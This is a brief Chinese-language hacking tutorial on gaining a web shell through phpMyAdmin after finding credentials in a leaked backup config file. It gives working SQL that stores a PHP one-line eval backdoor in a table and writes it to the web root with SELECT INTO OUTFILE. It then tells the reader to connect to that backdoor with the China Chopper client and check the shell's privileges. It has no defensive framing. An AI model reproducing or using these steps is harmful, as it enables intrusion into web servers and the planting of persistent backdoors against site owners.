phpmyadmin获得shell--初试一句话木马，chopper

进入到phpmyadmin后台（本例中以bak配置文件泄露为例）

  create table foo(`cmd` text not null);

  insert into `foo`(`cmd`) values ("<?php @eval($_POST['foo']);?>");

  select `cmd`  from `foo` into outfile "./foo.php"

(最好能找到网站路径的的路径，这样写的话在\wamp\bin\mysql\mysql5.6.17\data目录下会生成一个foo.php文件);

执行完命令后，可以测试是否成功，浏览器直接打开/foo.php，如果出现空白就可以。

接下来用chopper

地址为网站foo.php地址，密码为$_POST[]内的内容，配置（可填可不填，如果要管理数据库的话要填），接下来是脚本类型，编码。

这样就基本可以获得网站的shell，看shell的权限，有的权限很大，有的权限紧紧限于网站根目录的管理。